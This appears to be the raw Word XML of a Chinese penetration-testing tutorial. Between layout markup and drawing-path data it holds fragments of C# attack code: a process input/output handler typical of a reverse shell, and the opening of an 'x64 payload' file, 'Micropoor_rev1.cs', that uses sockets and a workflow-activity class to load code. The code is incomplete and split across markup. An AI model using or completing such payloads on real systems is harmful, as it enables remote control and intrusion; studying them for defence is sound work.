57,2778,6657,2777,6657,2776,6657,2776,6657,2775,6657,2775,6657,2774,6657,2774,6657,2773,6657,2772,6657,2772,6657,2771,6657,2770,6657,2769,6657,2768,6657,2768,6657,2767,6657,2766,6657,2765,6657,2764,6657,2763,6657,2762,6657,2761,6657,2760,6657,2759,6657,2758,6657,2757,6657,2755,6657,2754,6657,2753,6657,2752,6657,2750,6657,2749,6657,2748,6657,2746,6657,2745,6657,2743,6657,2742,6657,2740,6657,2738,6657,2737,6657,2735,6657,2733,6657,2732,6657,2730,6657,2728,6657,2726,6657,2724,6657,2722,6657,2720,6657,2718,6657,2716,6657,2714,6657,2712,6657,2710,6657,2708,6657,2705,6657,2703,6657,2701,6657,2698,6657,2696,6657,2693,6657,2691,6657,2688,6657,2685,6657,2683,6657,2680,6657,2677,6657,2674,6657,2671,6657,2668,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6657,2665,6656,2665,6656,2665,6656,2665,6656,2665,6656,2665,6656,2665,6655,2665,6655,2665,6655,2665,6654,2665,6654,2665,6654,2665,6653,2665,6653,2665,6652,2665,6652,2665,6651,2665,6651,2665,6650,2665,6650,2665,6649,2665,6648,2665,6648,2665,6647,2665,6646,2665,6645,2665,6644,2665,6644,2665,6643,2665,6642,2665,6641,2665,6640,2665,6638,2665,6637,2665,6636,2665,6635,2665,6634,2665,6632,2665,6631,2665,6629,2665,6628,2665,6626,2665,6625,2665,6623,2665,6621,2665,6619,2665,6618,2665,6616,2665,6614,2665,6612,2665,6610,2665,6608,2665,6605,2665,6603,2665,6601,2665,6598,2665,6596,2665,6593,2665,6591,2665,6588,2665,6586,2665,6583,2665,6580,2665,6577,2665,6574,2665,6571,2665,6568,2665,6564,2665,6561,2665,6558,2665,6554,2665,6551,2665,6547,2665,6543,2665,6539,2665,6536,2665,6532,2665,6528,2665,6523,2665,6519,2665,6515,2665,6510,2665,6506,2665,6501,2665,6497,2665,6492,2665,6487,2665,6482,2665,6477,2665,6472,2665,6467,2665,6461,2665,6456,2665,6450,2665,6445,2665,6439,2665,6433,2665,6427,2665,6421,2665,6415,2665,6409,2665,6402e x" fillcolor="#fefefe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78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38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{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39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strInput</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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Append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rdr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ReadLine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(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40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p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StandardInput</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15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WriteLine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strInput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41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strInput</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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Remove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strInput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Length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42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}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43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}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44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}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45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}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="9503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46</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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}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47</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="21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48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4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private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static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void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CmdOutputDataHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16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object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sendingProcess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="1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DataR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eceivedEventArgs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outLine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)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="156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49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{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="410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50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StringBuilder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strOutput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new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StringBuilder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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;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51</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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52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0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>if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(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!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String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IsNullOrEmpty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14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outLine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.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Data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)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53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{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54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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try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55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{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56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strOutput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Append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outLine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.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Data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57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streamWriter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15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WriteLine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strOutput</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="12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58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streamWriter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16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Flush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(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59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}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60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="17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catch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="21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err</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="2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}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61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}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="9503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62</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6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}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63</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13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64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}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="330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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micropoor_rev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.cs：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9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371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7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System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5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2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using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System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Workflow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Activities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>using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404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System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Net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5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4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using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System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Net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Sockets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5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5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using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System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Runtime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InteropServices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16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6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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using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System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Threading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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7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class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yrDaTlg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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: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SequentialWorkflowActivity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14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{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520.111pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:46.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,930">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:930" coordorigin="1490,970" coordsize="8990,930" path="m1510,999l1510,999,1510,999,1510,999,1510,999,1510,999,1510,999,1511,999,1512,999,1512,999,1514,999,1515,999,1517,999,1519,999,1521,999,1524,999,1528,999,1532,999,1536,999,1541,999,1546,999,1552,999,1559,999,1566,999,1575,999,1583,999,1593,999,1603,999,1615,999,1627,999,1640,999,1654,999,1668,999,1684,999,1701,999,1719,999,1738,999,1758,999,1780,999,1802,999,1826,999,1851,999,1877,999,1904,999,1933,999,1963,999,1995,999,2028,999,2063,999,2099,999,2136,999,2175,999,2216,999,2259,999,2303,999,2348,999,2396,999,2445,999,2496,999,2549,999,2604,999,2660,999,2719,999,2779,999,2841,999,2906,999,2972,999,3041,999,3112,999,3184,999,3259,999,3336,999,3416,999,3498,999,3582,999,3668,999,3757,999,3848,999,3941,999,4037,999,4136,999,4236,999,4340,999,4446,999,4555,999,4666,999,4780,999,4897,999,5017,999,5139,999,5264,999,5392,999,5523,999,5657,999,5793,999,5933,999,6076,999,6222,999,6370,999,6522,999,6677,999,6835,999,6997,999,7161,999,7329,999,7500,999,7675,999,7853,999,8034,999,8219,999,8407,999,8598,999,8793,999,8992,999,9194,999,9400,999,9609,999,9823,999,10039,999,10260,999,10484,999,10484,999,10484,999,10484,999,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1013,10484,1014,10484,1016,10484,1017,10484,1019,10484,1021,10484,1023,10484,1025,10484,1027,10484,1029,10484,1032,10484,1034,10484,1037,10484,1040,10484,1043,10484,1046,10484,1049,10484,1052,10484,1056,10484,1060,10484,1063,10484,1067,10484,1072,10484,1076,10484,1080,10484,1085,10484,1090,10484,1095,10484,1100,10484,1105,10484,1111,10484,1117,10484,1123,10484,1129,10484,1135,10484,1142,10484,1149,10484,1156,10484,1163,10484,1170,10484,1178,10484,1186,10484,1194,10484,1202,10484,1211,10484,1220,10484,1229,10484,1238,10484,1248,10484,1257,10484,1267,10484,1278,10484,1288,10484,1299,10484,1310,10484,1321,10484,1333,10484,1345,10484,1357,10484,1370,10484,1382,10484,1396,10484,1409,10484,1423,10484,1436,10484,1451,10484,1465,10484,1480,10484,1495,10484,1511,10484,1527,10484,1543,10484,1559,10484,1576,10484,1593,10484,1611,10484,1628,10484,1647,10484,1665,10484,1684,10484,1703,10484,1723,10484,1742,10484,1763,10484,1783,10484,1804,10484,1826,10484,1847,10484,1870,10484,1892,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10483,1915,10482,1915,10482,1915,10480,1915,10479,1915,10477,1915,10475,1915,10473,1915,10470,1915,10466,1915,10462,1915,10458,1915,10453,1915,10448,1915,10442,1915,10435,1915,10428,1915,10419,1915,10411,1915,10401,1915,10391,1915,10379,1915,10367,1915,10354,1915,10340,1915,10326,1915,10310,1915,10293,1915,10275,1915,10256,1915,10236,1915,10215,1915,10192,1915,10168,1915,10143,1915,10117,1915,10090,1915,10061,1915,10031,1915,9999,1915,9966,1915,9931,1915,9895,1915,9858,1915,9819,1915,9778,1915,9735,1915,9691,1915,9646,1915,9598,1915,9549,1915,9498,1915,9445,1915,9391,1915,9334,1915,9275,1915,9215,1915,9153,1915,9088,1915,9022,1915,8953,1915,8883,1915,8810,1915,8735,1915,8658,1915,8578,1915,8497,1915,8413,1915,8326,1915,8238,1915,8146,1915,8053,1915,7957,1915,7859,1915,7758,1915,7654,1915,7548,1915,7439,1915,7328,1915,7214,1915,7097,1915,6977,1915,6855,1915,6730,1915,6602,1915,6471,1915,6337,1915,6201,1915,6061,1915,5918,1915,5773,1915,5624,1915,5472,1915,5317,1915,5159,1915,4997,1915,4833,1915,4665,1915,4494,1915,4319,1915,4141,1915,3960,1915,3776,1915,3587,1915,3396,1915,3201,1915,3002,1915,2800,1915,2594,1915,2385,1915,2172,1915,1955,1915,1734,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1914,1510,1914,1510,1914,1510,1914,1510,1913,1510,1913,1510,1913,1510,1912,1510,1912,1510,1911,1510,1911,1510,1910,1510,1909,1510,1908,1510,1907,1510,1906,1510,1905,1510,1904,1510,1903,1510,1902,1510,1900,1510,1899,1510,1897,1510,1895,1510,1894,1510,1892,1510,1890,1510,1887,1510,1885,1510,1883,1510,1880,1510,1878,1510,1875,1510,1872,1510,1869,1510,1865,1510,1862,1510,1859,1510,1855,1510,1851,1510,1847,1510,1843,1510,1839,1510,1834,1510,1829,1510,1825,1510,1820,1510,1814,1510,1809,1510,1803,1510,1798,1510,1792,1510,1785,1510,1779,1510,1773,1510,1766,1510,1759,1510,1752,1510,1744,1510,1736,1510,1729,1510,1721,1510,1712,1510,1704,1510,1695,1510,1686,1510,1676,1510,1667,1510,1657,1510,1647,1510,1637,1510,1626,1510,1615,1510,1604,1510,1593,1510,1581,1510,1569,1510,1557,1510,1545,1510,1532,1510,1519,1510,1506,1510,1492,1510,1478,1510,1464,1510,1449,1510,1434,1510,1419,1510,1404,1510,1388,1510,1372,1510,1355,1510,1338,1510,1321,1510,1304,1510,1286,1510,1268,1510,1249,1510,1231,1510,1211,1510,1192,1510,1172,1510,1152,1510,1131,1510,1110,1510,1089,1510,1067,1510,1045,1510,1022,1510,999e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:46.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,930">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:930" coordorigin="1490,990" coordsize="30,930" path="m1517,999l1517,999,1517,999,1517,999,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1008,1517,1009,1517,1010,1517,1011,1517,1013,1517,1014,1517,1016,1517,1017,1517,1019,1517,1021,1517,1023,1517,1025,1517,1027,1517,1029,1517,1032,1517,1034,1517,1037,1517,1040,1517,1043,1517,1046,1517,1049,1517,1052,1517,1056,1517,1060,1517,1063,1517,1067,1517,1072,1517,1076,1517,1080,1517,1085,1517,1090,1517,1095,1517,1100,1517,1105,1517,1111,1517,1117,1517,1123,1517,1129,1517,1135,1517,1142,1517,1149,1517,1156,1517,1163,1517,1170,1517,1178,1517,1186,1517,1194,1517,1202,1517,1211,1517,1220,1517,1229,1517,1238,1517,1248,1517,1257,1517,1267,1517,1278,1517,1288,1517,1299,1517,1310,1517,1321,1517,1333,1517,1345,1517,1357,1517,1370,1517,1382,1517,1396,1517,1409,1517,1423,1517,1436,1517,1451,1517,1465,1517,1480,1517,1495,1517,1511,1517,1527,1517,1543,1517,1559,1517,1576,1517,1593,1517,1611,1517,1628,1517,1647,1517,1665,1517,1684,1517,1703,1517,1723,1517,1742,1517,1763,1517,1783,1517,1804,1517,1826,1517,1847,1517,1870,1517,1892,1517,1915e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:94.500pt;width:449.500pt;height:45.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1890" coordsize="8990,910">
        <v:shape style="position:absolute;left:1490;top:1890;width:8990;height:910" coordorigin="1490,1890" coordsize="8990,910" path="m1510,1915l1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1510,1915,1511,1915,1512,1915,1512,1915,1514,1915,1515,1915,1517,1915,1519,1915,1521,1915,1524,1915,1528,1915,1532,1915,1536,1915,1541,1915,1546,1915,1552,1915,1559,1915,1566,1915,1575,1915,1583,1915,1593,1915,1603,1915,1615,1915,1627,1915,1640,1915,1654,1915,1668,1915,1684,1915,1701,1915,1719,1915,1738,1915,1758,1915,1780,1915,1802,1915,1826,1915,1851,1915,1877,1915,1904,1915,1933,1915,1963,1915,1995,1915,2028,1915,2063,1915,2099,1915,2136,1915,2175,1915,2216,1915,2259,1915,2303,1915,2348,1915,2396,1915,2445,1915,2496,1915,2549,1915,2604,1915,2660,1915,2719,1915,2779,1915,2841,1915,2906,1915,2972,1915,3041,1915,3112,1915,3184,1915,3259,1915,3336,1915,3416,1915,3498,1915,3582,1915,3668,1915,3757,1915,3848,1915,3941,1915,4037,1915,4136,1915,4236,1915,4340,1915,4446,1915,4555,1915,4666,1915,4780,1915,4897,1915,5017,1915,5139,1915,5264,1915,5392,1915,5523,1915,5657,1915,5793,1915,5933,1915,6076,1915,6222,1915,6370,1915,6522,1915,6677,1915,6835,1915,6997,1915,7161,1915,7329,1915,7500,1915,7675,1915,7853,1915,8034,1915,8219,1915,8407,1915,8598,1915,8793,1915,8992,1915,9194,1915,9400,1915,9609,1915,9823,1915,10039,1915,10260,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1915,10484,1916,10484,1916,10484,1916,10484,1916,10484,1917,10484,1917,10484,1918,10484,1918,10484,1919,10484,1919,10484,1920,10484,1921,10484,1921,10484,1922,10484,1923,10484,1924,10484,1925,10484,1927,10484,1928,10484,1929,10484,1931,10484,1932,10484,1934,10484,1936,10484,1938,10484,1940,10484,1942,10484,1944,10484,1947,10484,1949,10484,1952,10484,1955,10484,1957,10484,1960,10484,1964,10484,1967,10484,1970,10484,1974,10484,1978,10484,1982,10484,1986,10484,1990,10484,1995,10484,1999,10484,2004,10484,2009,10484,2014,10484,2019,10484,2025,10484,2030,10484,2036,10484,2042,10484,2049,10484,2055,10484,2062,10484,2069,10484,2076,10484,2083,10484,2090,10484,2098,10484,2106,10484,2114,10484,2123,10484,2131,10484,2140,10484,2150,10484,2159,10484,2169,10484,2178,10484,2189,10484,2199,10484,2210,10484,2220,10484,2232,10484,2243,10484,2255,10484,2267,10484,2279,10484,2292,10484,2304,10484,2318,10484,2331,10484,2345,10484,2359,10484,2373,10484,2388,10484,2403,10484,2418,10484,2433,10484,2449,10484,2465,10484,2482,10484,2499,10484,2516,10484,2534,10484,2551,10484,2570,10484,2588,10484,2607,10484,2626,10484,2646,10484,2666,10484,2686,10484,2707,10484,2728,10484,2749,10484,2771,10484,2793,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10484,2815,10483,2815,10482,2815,10482,2815,10480,2815,10479,2815,10477,2815,10475,2815,10473,2815,10470,2815,10466,2815,10462,2815,10458,2815,10453,2815,10448,2815,10442,2815,10435,2815,10428,2815,10419,2815,10411,2815,10401,2815,10391,2815,10379,2815,10367,2815,10354,2815,10340,2815,10326,2815,10310,2815,10293,2815,10275,2815,10256,2815,10236,2815,10215,2815,10192,2815,10168,2815,10143,2815,10117,2815,10090,2815,1